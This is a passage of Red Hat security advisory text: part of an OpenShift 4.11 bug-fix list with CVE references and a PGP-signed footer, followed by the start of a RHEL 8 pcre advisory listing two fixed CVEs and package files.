2090437 - Bump CNO to k8s 1.24
2090465 - golang version mismatch
2090487 - Change default SNO Networking Type and disallow OpenShiftSDN a supported networking Type
2090537 - failure in ovndb migration when db is not ready in HA mode
2090549 - dpu-network-operator shall be able to run on amd64 arch platform
2090621 - Metal3 plugin does not work properly with updated NodeMaintenance CRD
2090627 - Git commit and branch are empty in MetalLB log
2090692 - Bump to latest 1.24 k8s release
2090730 - must-gather should include multus logs.
2090731 - nmstate deploys two instances of webhook on a single-node cluster
2090751 - oc image mirror skip-missing flag does not skip images
2090755 - MetalLB: BGPAdvertisement validation allows duplicate entries for ip pool selector, ip address pools, node selector and bgp peers
2090774 - Add Readme to plugin directory
2090794 - MachineConfigPool cannot apply a configuration after fixing the pods that caused a drain alert
2090809 - gm.ClockClass invalid syntax parse error in linux ptp daemon logs
2090816 - OCP 4.8 Baremetal IPI installation failure: "Bootstrap failed to complete: timed out waiting for the condition"
2090819 - oc-mirror does not catch invalid registry input when a namespace is specified
2090827 - Rebase CoreDNS to 1.9.2 and k8s 1.24
2090829 - Bump OpenShift router to k8s 1.24
2090838 - Flaky test: ignore flapping host interface 'tunbr'
2090843 - addLogicalPort() performance/scale optimizations
2090895 - Dynamic plugin nav extension "startsWith" property does not work
2090929 - [etcd] cluster-backup.sh script has a conflict to use the '/etc/kubernetes/static-pod-certs' folder if a custom API certificate is defined
2090993 - [AI Day2] Worker node overview page crashes in Openshift console with TypeError
2091029 - Cancel rollout action only appears when rollout is completed
2091030 - Some BM may fail booting with default bootMode strategy
2091033 - [Descheduler]: provide ability to override included/excluded namespaces
2091087 - ODC Helm backend Owners file needs updates
2091106 - Dependabot alert: Unhandled exception in gopkg.in/yaml.v3
2091142 - Dependabot alert: Unhandled exception in gopkg.in/yaml.v3
2091167 - IPsec runtime enabling not work in hypershift
2091218 - Update Dev Console Helm backend to use helm 3.9.0
2091433 - Update AWS instance types
2091542 - Error Loading/404 not found page shown after clicking "Current namespace only"
2091547 - Internet connection test with proxy permanently fails
2091567 - oVirt CSI driver should use latest go-ovirt-client
2091595 - Alertmanager configuration can't use OpsGenie's entity field when AlertmanagerConfig is enabled
2091599 - PTP Dual Nic | Extend Events 4.11 - Up/Down master interface affects all the other interface in the same NIC accoording the events and metric
2091603 - WebSocket connection restarts when switching tabs in WebTerminal
2091613 - simple-kmod fails to build due to missing KVC
2091634 - OVS 2.15 stops handling traffic once ovs-dpctl(2.17.2) is used against it
2091730 - MCO e2e tests are failing with "No token found in openshift-monitoring secrets"
2091746 - "Oh no! Something went wrong" shown after user creates MCP without 'spec'
2091770 - CVO gets stuck downloading an upgrade, with the version pod complaining about invalid options
2091854 - clusteroperator status filter doesn't match all values in Status column
2091901 - Log stream paused right after updating log lines in Web Console in OCP4.10
2091902 - unable to retrieve the complete list of server APIs: metrics.k8s.io/v1beta1: the server has received too many requests and has asked us to try again later
2091990 - wrong external-ids for ovn-controller lflow-cache-limit-kb
2092003 - PR 3162 | BZ 2084450 - invalid URL schema for AWS causes tests to perma fail and break the cloud-network-config-controller
2092041 - Bump cluster-dns-operator to k8s 1.24
2092042 - Bump cluster-ingress-operator to k8s 1.24
2092047 - Kube 1.24 rebase for cloud-network-config-controller
2092137 - Search doesn't show all entries when name filter is cleared
2092296 - Change Default MachineCIDR of Power VS Platform from 10.x to 192.168.0.0/16
2092390 - [RDR] [UI] Multiple instances of Object Bucket, Object Bucket Claims and 'Overview' tab is present under Storage section on the Hub cluster when navigated back from the Managed cluster using the Hybrid console dropdown
2092395 - etcdHighNumberOfFailedGRPCRequests alerts with wrong results
2092408 - Wrong icon is used in the virtualization overview permissions card
2092414 - In virtualization overview "running vm per templates" template list can be improved
2092442 - Minimum time between drain retries is not the expected one
2092464 - marketplace catalog defaults to v4.10
2092473 - libovsdb performance backports
2092495 - ovn: use up to 4 northd threads in non-SNO clusters
2092502 - [azure-file-csi-driver] Stop shipping a NFS StorageClass
2092509 - Invalid memory address error if non existing caBundle is configured in DNS-over-TLS using ForwardPlugins
2092572 - acm-simple-kmod chart should create the namespace on the spoke cluster
2092579 - Don't retry pod deletion if objects are not existing
2092650 - [BM IPI with Provisioning Network] Worker nodes are not provisioned: ironic-agent is stuck before writing into disks
2092703 - Incorrect mount propagation information in container status
2092815 - can't delete the unwanted image from registry by oc-mirror
2092851 - [Descheduler]: allow to customize the LowNodeUtilization strategy thresholds
2092867 - make repository name unique in acm-ice/acm-simple-kmod examples
2092880 - etcdHighNumberOfLeaderChanges returns incorrect number of leadership changes
2092887 - oc-mirror list releases command uses filter-options flag instead of filter-by-os
2092889 - Incorrect updating of EgressACLs using direction "from-lport"
2092918 - CVE-2022-30321 go-getter: unsafe download (issue 1 of 3)
2092923 - CVE-2022-30322 go-getter: unsafe download (issue 2 of 3)
2092925 - CVE-2022-30323 go-getter: unsafe download (issue 3 of 3)
2092928 - CVE-2022-26945 go-getter: command injection vulnerability
2092937 - WebScale: OVN-k8s forwarding to external-gw over the secondary interfaces failing
2092966 - [OCP 4.11] [azure] /etc/udev/rules.d/66-azure-storage.rules missing from initramfs
2093044 - Azure machine-api-provider-azure Availability Set Name Length Limit
2093047 - Dynamic Plugins: Generated API markdown duplicates `checkAccess` and `useAccessReview` doc
2093126 - [4.11] Bootimage bump tracker
2093236 - DNS operator stopped reconciling after 4.10 to 4.11 upgrade | 4.11 nightly to 4.11 nightly upgrade
2093288 - Default catalogs fails liveness/readiness probes
2093357 - Upgrading sno spoke with acm-ice, causes the sno to get unreachable
2093368 - Installer orphans FIPs created for LoadBalancer Services on `cluster destroy`
2093396 - Remove node-tainting for too-small MTU
2093445 - ManagementState reconciliation breaks SR
2093454 - Router proxy protocol doesn't work with dual-stack (IPv4 and IPv6) clusters
2093462 - Ingress Operator isn't reconciling the ingress cluster operator object
2093586 - Topology: Ctrl+space opens the quick search modal, but doesn't close it again
2093593 - Import from Devfile shows configuration options that shoudn't be there
2093597 - Import: Advanced option sentence is splited into two parts and headlines has no padding
2093600 - Project access tab should apply new permissions before it delete old ones
2093601 - Project access page doesn't allow the user to update the settings twice (without manually reload the content)
2093783 - Should bump cluster-kube-descheduler-operator to kubernetes version V1.24
2093797 - 'oc registry login' with serviceaccount function need update
2093819 - An etcd member for a new machine was never added to the cluster
2093930 - Gather console helm install totals metric
2093957 - Oc-mirror write dup metadata to registry backend
2093986 - Podsecurity violation error getting logged for pod-identity-webhook
2093992 - Cluster version operator acknowledges upgrade failing on periodic-ci-openshift-release-master-nightly-4.11-e2e-metal-ipi-upgrade-ovn-ipv6
2094023 - Add Git Flow - Template Labels for Deployment show as DeploymentConfig
2094024 - bump oauth-apiserver deps to include 1.23.1 k8s that fixes etcd blips
2094039 - egressIP panics with nil pointer dereference
2094055 - Bump coreos-installer for s390x Secure Execution
2094071 - No runbook created for SouthboundStale alert
2094088 - Columns in NBDB may never be updated by OVNK
2094104 - Demo dynamic plugin image tests should be skipped when testing console-operator
2094152 - Alerts in the virtualization overview status card aren't filtered
2094196 - Add default and validating webhooks for Power VS MAPI
2094227 - Topology: Create Service Binding should not be the last option (even under delete)
2094239 - custom pool Nodes with 0 nodes are always populated in progress bar
2094303 - If og is configured with sa, operator installation will be failed.
2094335 - [Nutanix] - debug logs are enabled by default in machine-controller
2094342 - apirequests limits of Cluster CAPI Operator are too low for Azure platform
2094438 - Make AWS URL parsing more lenient for GetNodeEgressIPConfiguration
2094525 - Allow automatic upgrades for efs operator
2094532 - ovn-windows CI jobs are broken
2094675 - PTP Dual Nic | Extend Events 4.11 - when kill the phc2sys We have notification for the ptp4l physical master moved to free run
2094694 - [Nutanix] No cluster name sanity validation - cluster name with a dot (".") character
2094704 - Verbose log activated on kube-rbac-proxy in deployment prometheus-k8s
2094801 - Kuryr controller keep restarting when handling IPs with leading zeros
2094806 - Machine API oVrit component should use K8s 1.24 dependencies
2094816 - Kuryr controller restarts when over quota
2094833 - Repository overview page does not show default PipelineRun template for developer user
2094857 - CloudShellTerminal loops indefinitely if DevWorkspace CR goes into failed state
2094864 - Rebase CAPG to latest changes
2094866 - oc-mirror does not always delete all manifests associated with an image during pruning
2094896 - Run 'openshift-install agent create image' has segfault exception if cluster-manifests directory missing
2094902 - Fix installer cross-compiling
2094932 - MGMT-10403 Ingress should enable single-node cluster expansion on upgraded clusters
2095049 - managed-csi StorageClass does not create PVs
2095071 - Backend tests fails after devfile registry update
2095083 - Observe > Dashboards: Graphs may change a lot on automatic refresh
2095110 - [ovn] northd container termination script must use bash
2095113 - [ovnkube] bump to openvswitch2.17-2.17.0-22.el8fdp
2095226 - Added changes to verify cloud connection and dhcpservices quota of a powervs instance
2095229 - ingress-operator pod in CrashLoopBackOff in 4.11 after upgrade starting in 4.6 due to go panic
2095231 - Kafka Sink sidebar in topology is empty
2095247 - Event sink form doesn't show channel as sink until app is refreshed
2095248 - [vSphere-CSI-Driver] does not report volume count limits correctly caused pod with multi volumes maybe schedule to not satisfied volume count node
2095256 - Samples Owner needs to be Updated
2095264 - ovs-configuration.service fails with Error: Failed to modify connection 'ovs-if-br-ex': failed to update connection: error writing to file '/etc/NetworkManager/systemConnectionsMerged/ovs-if-br-ex.nmconnection'
2095362 - oVirt CSI driver operator should use latest go-ovirt-client
2095574 - e2e-agnostic CI job fails
2095687 - Debug Container shown for build logs and on click ui breaks
2095703 - machinedeletionhooks doesn't work in vsphere cluster and BM cluster
2095716 - New PSA component for Pod Security Standards enforcement is refusing openshift-operators ns
2095756 - CNO panics with concurrent map read/write
2095772 - Memory requests for ovnkube-master containers are over-sized
2095917 - Nutanix set osDisk with diskSizeGB rather than diskSizeMiB
2095941 - DNS Traffic not kept local to zone or node when Calico SDN utilized
2096053 - Builder Image icons
in Git Import flow are hard to see in Dark mode\n2096226 - crio fails to bind to tentative IP, causing service failure since RHOCS was rebased on RHEL 8.6\n2096315 - NodeClockNotSynchronising alert\u0027s severity should be critical\n2096350 - Web console doesn\u0027t display webhook errors for upgrades\n2096352 - Collect whole journal in gather\n2096380 - acm-simple-kmod references deprecated KVC example\n2096392 - Topology node icons are not properly visible in Dark mode\n2096394 - Add page Card items background color does not match with column background color in Dark mode\n2096413 - br-ex not created due to default bond interface having a different mac address than expected\n2096496 - FIPS issue on OCP SNO with RT Kernel via performance profile\n2096605 - [vsphere] no validation checking for diskType\n2096691 - [Alibaba 4.11] Specifying ResourceGroup id in install-config.yaml, New pv are still getting created to default ResourceGroups\n2096855 - `oc adm release new` failed with error when use an existing multi-arch release image as input\n2096905 - Openshift installer should not use the prism client embedded in nutanix terraform provider\n2096908 - Dark theme issue in pipeline builder, Helm rollback form, and Git import\n2097000 - KafkaConnections disappear from Topology after creating KafkaSink in Topology\n2097043 - No clean way to specify operand issues to KEDA OLM operator\n2097047 - MetalLB: matchExpressions used in CR like L2Advertisement, BGPAdvertisement, BGPPeers allow duplicate entries\n2097067 - ClusterVersion history pruner does not always retain initial completed update entry\n2097153 - poor performance on API call to vCenter ListTags with thousands of tags\n2097186 - PSa autolabeling in 4.11 env upgraded from 4.10 does not work due to missing RBAC objects\n2097239 - Change Lower CPU limits for Power VS cloud\n2097246 - Kuryr: verify and unit jobs failing due to upstream OpenStack dropping py36 support\n2097260 - openshift-install create manifests 
failed for Power VS platform\n2097276 - MetalLB CI deploys the operator via manifests and not using the csv\n2097282 - chore: update external-provisioner to the latest upstream release\n2097283 - chore: update external-snapshotter to the latest upstream release\n2097284 - chore: update external-attacher to the latest upstream release\n2097286 - chore: update node-driver-registrar to the latest upstream release\n2097334 - oc plugin help shows \u0027kubectl\u0027\n2097346 - Monitoring must-gather doesn\u0027t seem to be working anymore in 4.11\n2097400 - Shared Resource CSI Driver needs additional permissions for validation webhook\n2097454 - Placeholder bug for OCP 4.11.0 metadata release\n2097503 - chore: rebase against latest external-resizer\n2097555 - IngressControllersNotUpgradeable: load balancer service has been modified; changes must be reverted before upgrading\n2097607 - Add Power VS support to Webhooks tests in actuator e2e test\n2097685 - Ironic-agent can\u0027t restart because of existing container\n2097716 - settings under httpConfig is dropped with AlertmanagerConfig v1beta1\n2097810 - Required Network tools missing for Testing e2e PTP\n2097832 - clean up unused IPv6DualStackNoUpgrade feature gate\n2097940 - openshift-install destroy cluster traps if vpcRegion not specified\n2097954 - 4.11 installation failed at monitoring and network clusteroperators with error \"conmon: option parsing failed: Unknown option --log-global-size-max\" making all jobs failing\n2098172 - oc-mirror does not validatethe registry in the storage config\n2098175 - invalid license in python-dataclasses-0.8-2.el8 spec\n2098177 - python-pint-0.10.1-2.el8 has unused Patch0 in spec file\n2098242 - typo in SRO specialresourcemodule\n2098243 - Add error check to Platform create for Power VS\n2098392 - [OCP 4.11] Ironic cannot match \"wwn\" rootDeviceHint for a multipath device\n2098508 - Control-plane-machine-set-operator report panic\n2098610 - No need to check the push permission 
with ?manifests-only option\n2099293 - oVirt cluster API provider should use latest go-ovirt-client\n2099330 - Edit application grouping is shown to user with view only access in a cluster\n2099340 - CAPI e2e tests for AWS are missing\n2099357 - ovn-kubernetes needs explicit RBAC coordination leases for 1.24 bump\n2099358 - Dark mode+Topology update: Unexpected selected+hover border and background colors for app groups\n2099528 - Layout issue: No spacing in delete modals\n2099561 - Prometheus returns HTTP 500 error on /favicon.ico\n2099582 - Format and update Repository overview content\n2099611 - Failures on etcd-operator watch channels\n2099637 - Should print error when use --keep-manifest-list\\xfalse for manifestlist image\n2099654 - Topology performance: Endless rerender loop when showing a Http EventSink (KameletBinding)\n2099668 - KubeControllerManager should degrade when GC stops working\n2099695 - Update CAPG after rebase\n2099751 - specialresourcemodule stacktrace while looping over build status\n2099755 - EgressIP node\u0027s mgmtIP reachability configuration option\n2099763 - Update icons for event sources and sinks in topology, Add page, and context menu\n2099811 - UDP Packet loss in OpenShift using IPv6 [upcall]\n2099821 - exporting a pointer for the loop variable\n2099875 - The speaker won\u0027t start if there\u0027s another component on the host listening on 8080\n2099899 - oc-mirror looks for layers in the wrong repository when searching for release images during publishing\n2099928 - [FJ OCP4.11 Bug]: Add unit tests to image_customization_test file\n2099968 - [Azure-File-CSI] failed to provisioning volume in ARO cluster\n2100001 - Sync upstream v1.22.0 downstream\n2100007 - Run bundle-upgrade failed from the traditional File-Based Catalog installed operator\n2100033 - OCP 4.11 IPI - Some csr remain \"Pending\" post deployment\n2100038 - failure to update special-resource-lifecycle table during update Event\n2100079 - SDN needs explicit RBAC 
coordination leases for 1.24 bump\n2100138 - release info --bugs has no differentiator between Jira and Bugzilla\n2100155 - kube-apiserver-operator should raise an alert when there is a Pod Security admission violation\n2100159 - Dark theme: Build icon for pending status is not inverted in topology sidebar\n2100323 - Sqlit-based catsrc cannot be ready due to \"Error: open ./db-xxxx: permission denied\"\n2100347 - KASO retains old config values when switching from Medium/Default to empty worker latency profile\n2100356 - Remove Condition tab and create option from console as it is deprecated in OSP-1.8\n2100439 - [gce-pd] GCE PD in-tree storage plugin tests not running\n2100496 - [OCPonRHV]-oVirt API returns affinity groups without a description field\n2100507 - Remove redundant log lines from obj_retry.go\n2100536 - Update API to allow EgressIP node reachability check\n2100601 - Update CNO to allow EgressIP node reachability check\n2100643 - [Migration] [GCP]OVN can not rollback to SDN\n2100644 - openshift-ansible FTBFS on RHEL8\n2100669 - Telemetry should not log the full path if it contains a username\n2100749 - [OCP 4.11] multipath support needs multipath modules\n2100825 - Update machine-api-powervs go modules to latest version\n2100841 - tiny openshift-install usability fix for setting KUBECONFIG\n2101460 - An etcd member for a new machine was never added to the cluster\n2101498 - Revert Bug 2082599: add upper bound to number of failed attempts\n2102086 - The base image is still 4.10 for operator-sdk 1.22\n2102302 - Dummy bug for 4.10 backports\n2102362 - Valid regions should be allowed in GCP install config\n2102500 - Kubernetes NMState pods can not evict due to PDB on an SNO cluster\n2102639 - Drain happens before other image-registry pod is ready to service requests, causing disruption\n2102782 - topolvm-controller get into CrashLoopBackOff few minutes after install\n2102834 - [cloud-credential-operator]container has runAsNonRoot and image will run as 
root\n2102947 - [VPA] recommender is logging errors for pods with init containers\n2103053 - [4.11] Backport Prow CI improvements from master\n2103075 - Listing secrets in all namespaces with a specific labelSelector does not work properly\n2103080 - br-ex not created due to default bond interface having a different mac address than expected\n2103177 - disabling ipv6 router advertisements using \"all\" does not disable it on secondary interfaces\n2103728 - Carry HAProxy patch \u0027BUG/MEDIUM: h2: match absolute-path not path-absolute for :path\u0027\n2103749 - MachineConfigPool is not getting updated\n2104282 - heterogeneous arch: oc adm extract encodes arch specific release payload pullspec rather than the manifestlisted pullspec\n2104432 - [dpu-network-operator] Updating images to be consistent with ART\n2104552 - kube-controller-manager operator 4.11.0-rc.0 degraded on disabled monitoring stack\n2104561 - 4.10 to 4.11 update: Degraded node: unexpected on-disk state: mode mismatch for file: \"/etc/crio/crio.conf.d/01-ctrcfg-pidsLimit\"; expected: -rw-r--r--/420/0644; received: ----------/0/0\n2104589 - must-gather namespace should have ?privileged? 
warn and audit pod security labels besides enforce\n2104701 - In CI 4.10 HAProxy must-gather takes longer than 10 minutes\n2104717 - NetworkPolicies: ovnkube-master pods crashing due to panic: \"invalid memory address or nil pointer dereference\"\n2104727 - Bootstrap node should honor http proxy\n2104906 - Uninstall fails with Observed a panic: runtime.boundsError\n2104951 - Web console doesn\u0027t display webhook errors for upgrades\n2104991 - Completed pods may not be correctly cleaned up\n2105101 - NodeIP is used instead of EgressIP if egressPod is recreated within 60 seconds\n2105106 - co/node-tuning: Waiting for 15/72 Profiles to be applied\n2105146 - Degraded=True noise with: UpgradeBackupControllerDegraded: unable to retrieve cluster version, no completed update was found in cluster version status history\n2105167 - BuildConfig throws error when using a label with a / in it\n2105334 - vmware-vsphere-csi-driver-controller can\u0027t use host port error on e2e-vsphere-serial\n2105382 - Add a validation webhook for Nutanix machine provider spec in Machine API Operator\n2105468 - The ccoctl does not seem to know how to leverage the VMs service account to talk to GCP APIs. \n2105937 - telemeter golangci-lint outdated blocking ART PRs that update to Go1.18\n2106051 - Unable to deploy acm-ice using latest SRO 4.11 build\n2106058 - vSphere defaults to SecureBoot on; breaks installation of out-of-tree drivers [4.11.0]\n2106062 - [4.11] Bootimage bump tracker\n2106116 - IngressController spec.tuningOptions.healthCheckInterval validation allows invalid values such as \"0abc\"\n2106163 - Samples ImageStreams vs. registry.redhat.io: unsupported: V2 schema 1 manifest digests are no longer supported for image pulls\n2106313 - bond-cni: backport bond-cni GA items to 4.11\n2106543 - Typo in must-gather release-4.10\n2106594 - crud/other-routes.spec.ts Cypress test failing at a high rate in CI\n2106723 - [4.11] Upgrade from 4.11.0-rc0 -\u003e 4.11.0-rc.1 failed. 
rpm-ostree status shows No space left on device\n2106855 - [4.11.z] externalTrafficPolicy=Local is not working in local gateway mode if ovnkube-node is restarted\n2107493 - ReplicaSet prometheus-operator-admission-webhook has timed out progressing\n2107501 - metallb greenwave tests failure\n2107690 - Driver Container builds fail with \"error determining starting point for build: no FROM statement found\"\n2108175 - etcd backup seems to not be triggered in 4.10.18--\u003e4.10.20 upgrade\n2108617 - [oc adm release] extraction of the installer against a manifestlisted payload referenced by tag leads to a bad release image reference\n2108686 - rpm-ostreed: start limit hit easily\n2110505 - [Upgrade]deployment openshift-machine-api/machine-api-operator has a replica failure FailedCreate\n2110715 - openshift-controller-manager(-operator) namespace should clear run-level annotations\n2111055 - dummy bug for 4.10.z bz2110938\n\n5. References:\n\nhttps://access.redhat.com/security/cve/CVE-2018-25009\nhttps://access.redhat.com/security/cve/CVE-2018-25010\nhttps://access.redhat.com/security/cve/CVE-2018-25012\nhttps://access.redhat.com/security/cve/CVE-2018-25013\nhttps://access.redhat.com/security/cve/CVE-2018-25014\nhttps://access.redhat.com/security/cve/CVE-2018-25032\nhttps://access.redhat.com/security/cve/CVE-2019-5827\nhttps://access.redhat.com/security/cve/CVE-2019-13750\nhttps://access.redhat.com/security/cve/CVE-2019-13751\nhttps://access.redhat.com/security/cve/CVE-2019-17594\nhttps://access.redhat.com/security/cve/CVE-2019-17595\nhttps://access.redhat.com/security/cve/CVE-2019-18218\nhttps://access.redhat.com/security/cve/CVE-2019-19603\nhttps://access.redhat.com/security/cve/CVE-2019-20838\nhttps://access.redhat.com/security/cve/CVE-2020-13435\nhttps://access.redhat.com/security/cve/CVE-2020-14155\nhttps://access.redhat.com/security/cve/CVE-2020-17541\nhttps://access.redhat.com/security/cve/CVE-2020-19131\nhttps://access.redhat.com/security/cve/CVE-2020-24370\nhttp
s://access.redhat.com/security/cve/CVE-2020-28493\nhttps://access.redhat.com/security/cve/CVE-2020-35492\nhttps://access.redhat.com/security/cve/CVE-2020-36330\nhttps://access.redhat.com/security/cve/CVE-2020-36331\nhttps://access.redhat.com/security/cve/CVE-2020-36332\nhttps://access.redhat.com/security/cve/CVE-2021-3481\nhttps://access.redhat.com/security/cve/CVE-2021-3580\nhttps://access.redhat.com/security/cve/CVE-2021-3634\nhttps://access.redhat.com/security/cve/CVE-2021-3672\nhttps://access.redhat.com/security/cve/CVE-2021-3695\nhttps://access.redhat.com/security/cve/CVE-2021-3696\nhttps://access.redhat.com/security/cve/CVE-2021-3697\nhttps://access.redhat.com/security/cve/CVE-2021-3737\nhttps://access.redhat.com/security/cve/CVE-2021-4115\nhttps://access.redhat.com/security/cve/CVE-2021-4156\nhttps://access.redhat.com/security/cve/CVE-2021-4189\nhttps://access.redhat.com/security/cve/CVE-2021-20095\nhttps://access.redhat.com/security/cve/CVE-2021-20231\nhttps://access.redhat.com/security/cve/CVE-2021-20232\nhttps://access.redhat.com/security/cve/CVE-2021-23177\nhttps://access.redhat.com/security/cve/CVE-2021-23566\nhttps://access.redhat.com/security/cve/CVE-2021-23648\nhttps://access.redhat.com/security/cve/CVE-2021-25219\nhttps://access.redhat.com/security/cve/CVE-2021-31535\nhttps://access.redhat.com/security/cve/CVE-2021-31566\nhttps://access.redhat.com/security/cve/CVE-2021-36084\nhttps://access.redhat.com/security/cve/CVE-2021-36085\nhttps://access.redhat.com/security/cve/CVE-2021-36086\nhttps://access.redhat.com/security/cve/CVE-2021-36087\nhttps://access.redhat.com/security/cve/CVE-2021-38185\nhttps://access.redhat.com/security/cve/CVE-2021-38593\nhttps://access.redhat.com/security/cve/CVE-2021-40528\nhttps://access.redhat.com/security/cve/CVE-2021-41190\nhttps://access.redhat.com/security/cve/CVE-2021-41617\nhttps://access.redhat.com/security/cve/CVE-2021-42771\nhttps://access.redhat.com/security/cve/CVE-2021-43527\nhttps://access.redhat.com/security/
cve/CVE-2021-43818\nhttps://access.redhat.com/security/cve/CVE-2021-44225\nhttps://access.redhat.com/security/cve/CVE-2021-44906\nhttps://access.redhat.com/security/cve/CVE-2022-0235\nhttps://access.redhat.com/security/cve/CVE-2022-0778\nhttps://access.redhat.com/security/cve/CVE-2022-1012\nhttps://access.redhat.com/security/cve/CVE-2022-1215\nhttps://access.redhat.com/security/cve/CVE-2022-1271\nhttps://access.redhat.com/security/cve/CVE-2022-1292\nhttps://access.redhat.com/security/cve/CVE-2022-1586\nhttps://access.redhat.com/security/cve/CVE-2022-1621\nhttps://access.redhat.com/security/cve/CVE-2022-1629\nhttps://access.redhat.com/security/cve/CVE-2022-1706\nhttps://access.redhat.com/security/cve/CVE-2022-1729\nhttps://access.redhat.com/security/cve/CVE-2022-2068\nhttps://access.redhat.com/security/cve/CVE-2022-2097\nhttps://access.redhat.com/security/cve/CVE-2022-21698\nhttps://access.redhat.com/security/cve/CVE-2022-22576\nhttps://access.redhat.com/security/cve/CVE-2022-23772\nhttps://access.redhat.com/security/cve/CVE-2022-23773\nhttps://access.redhat.com/security/cve/CVE-2022-23806\nhttps://access.redhat.com/security/cve/CVE-2022-24407\nhttps://access.redhat.com/security/cve/CVE-2022-24675\nhttps://access.redhat.com/security/cve/CVE-2022-24903\nhttps://access.redhat.com/security/cve/CVE-2022-24921\nhttps://access.redhat.com/security/cve/CVE-2022-25313\nhttps://access.redhat.com/security/cve/CVE-2022-25314\nhttps://access.redhat.com/security/cve/CVE-2022-26691\nhttps://access.redhat.com/security/cve/CVE-2022-26945\nhttps://access.redhat.com/security/cve/CVE-2022-27191\nhttps://access.redhat.com/security/cve/CVE-2022-27774\nhttps://access.redhat.com/security/cve/CVE-2022-27776\nhttps://access.redhat.com/security/cve/CVE-2022-27782\nhttps://access.redhat.com/security/cve/CVE-2022-28327\nhttps://access.redhat.com/security/cve/CVE-2022-28733\nhttps://access.redhat.com/security/cve/CVE-2022-28734\nhttps://access.redhat.com/security/cve/CVE-2022-28735\nhttps://acces
s.redhat.com/security/cve/CVE-2022-28736\nhttps://access.redhat.com/security/cve/CVE-2022-28737\nhttps://access.redhat.com/security/cve/CVE-2022-29162\nhttps://access.redhat.com/security/cve/CVE-2022-29810\nhttps://access.redhat.com/security/cve/CVE-2022-29824\nhttps://access.redhat.com/security/cve/CVE-2022-30321\nhttps://access.redhat.com/security/cve/CVE-2022-30322\nhttps://access.redhat.com/security/cve/CVE-2022-30323\nhttps://access.redhat.com/security/cve/CVE-2022-32250\nhttps://access.redhat.com/security/updates/classification/#important\n\n6. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYvOfk9zjgjWX9erEAQhJ/w//UlbBGKBBFBAyfEmQf9Zu0yyv6MfZW0Zl\niO1qXVIl9UQUFjTY5ejerx7cP8EBWLhKaiiqRRjbjtj+w+ENGB4LLj6TEUrSM5oA\nYEmhnX3M+GUKF7Px61J7rZfltIOGhYBvJ+qNZL2jvqz1NciVgI4/71cZWnvDbGpa\n02w3Dn0JzhTSR9znNs9LKcV/anttJ3NtOYhqMXnN8EpKdtzQkKRazc7xkOTxfxyl\njRiER2Z0TzKDE6dMoVijS2Sv5j/JF0LRwetkZl6+oh8ehKh5GRV3lPg3eVkhzDEo\n/gp0P9GdLMHi6cS6uqcREbod//waSAa7cssgULoycFwjzbDK3L2c+wMuWQIgXJca\nRYuP6wvrdGwiI1mgUi/226EzcZYeTeoKxnHkp7AsN9l96pJYafj0fnK1p9NM/8g3\njBE/W4K8jdDNVd5l1Z5O0Nyxk6g4P8MKMe10/w/HDXFPSgufiCYIGX4TKqb+ESIR\nSuYlSMjoGsB4mv1KMDEUJX6d8T05lpEwJT0RYNdZOouuObYMtcHLpRQHH9mkj86W\npHdma5aGG/mTMvSMW6l6L05uT41Azm6fVimTv+E5WvViBni2480CVH+9RexKKSyL\nXcJX1gaLdo+72I/gZrtT+XE5tcJ3Sf5fmfsenQeY4KFum/cwzbM6y7RGn47xlEWB\nxBWKPzRxz0Q=\n=9r0B\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Relevant releases/architectures:\n\nRed Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, s390x, x86_64\n\n3. Description:\n\nPCRE is a Perl-compatible regular expression library. 
\n\nSecurity Fix(es):\n\n* pcre: Buffer over-read in JIT when UTF is disabled and \\X or \\R has fixed\nquantifier greater than 1 (CVE-2019-20838)\n\n* pcre: Integer overflow when parsing callout numeric arguments\n(CVE-2020-14155)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.5 Release Notes linked from the References section. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1848436 - CVE-2020-14155 pcre: Integer overflow when parsing callout numeric arguments\n1848444 - CVE-2019-20838 pcre: Buffer over-read in JIT when UTF is disabled and \\X or \\R has fixed quantifier greater than 1\n\n6. Package List:\n\nRed Hat Enterprise Linux BaseOS (v. 
8):\n\nSource:\npcre-8.42-6.el8.src.rpm\n\naarch64:\npcre-8.42-6.el8.aarch64.rpm\npcre-cpp-8.42-6.el8.aarch64.rpm\npcre-cpp-debuginfo-8.42-6.el8.aarch64.rpm\npcre-debuginfo-8.42-6.el8.aarch64.rpm\npcre-debugsource-8.42-6.el8.aarch64.rpm\npcre-devel-8.42-6.el8.aarch64.rpm\npcre-tools-debuginfo-8.42-6.el8.aarch64.rpm\npcre-utf16-8.42-6.el8.aarch64.rpm\npcre-utf16-debuginfo-8.42-6.el8.aarch64.rpm\npcre-utf32-8.42-6.el8.aarch64.rpm\npcre-utf32-debuginfo-8.42-6.el8.aarch64.rpm\n\nppc64le:\npcre-8.42-6.el8.ppc64le.rpm\npcre-cpp-8.42-6.el8.ppc64le.rpm\npcre-cpp-debuginfo-8.42-6.el8.ppc64le.rpm\npcre-debuginfo-8.42-6.el8.ppc64le.rpm\npcre-debugsource-8.42-6.el8.ppc64le.rpm\npcre-devel-8.42-6.el8.ppc64le.rpm\npcre-tools-debuginfo-8.42-6.el8.ppc64le.rpm\npcre-utf16-8.42-6.el8.ppc64le.rpm\npcre-utf16-debuginfo-8.42-6.el8.ppc64le.rpm\npcre-utf32-8.42-6.el8.ppc64le.rpm\npcre-utf32-debuginfo-8.42-6.el8.ppc64le.rpm\n\ns390x:\npcre-8.42-6.el8.s390x.rpm\npcre-cpp-8.42-6.el8.s390x.rpm\npcre-cpp-debuginfo-8.42-6.el8.s390x.rpm\npcre-debuginfo-8.42-6.el8.s390x.rpm\npcre-debugsource-8.42-6.el8.s390x.rpm\npcre-devel-8.42-6.el8.s390x.rpm\npcre-tools-debuginfo-8.42-6.el8.s390x.rpm\npcre-utf16-8.42-6.el8.s390x.rpm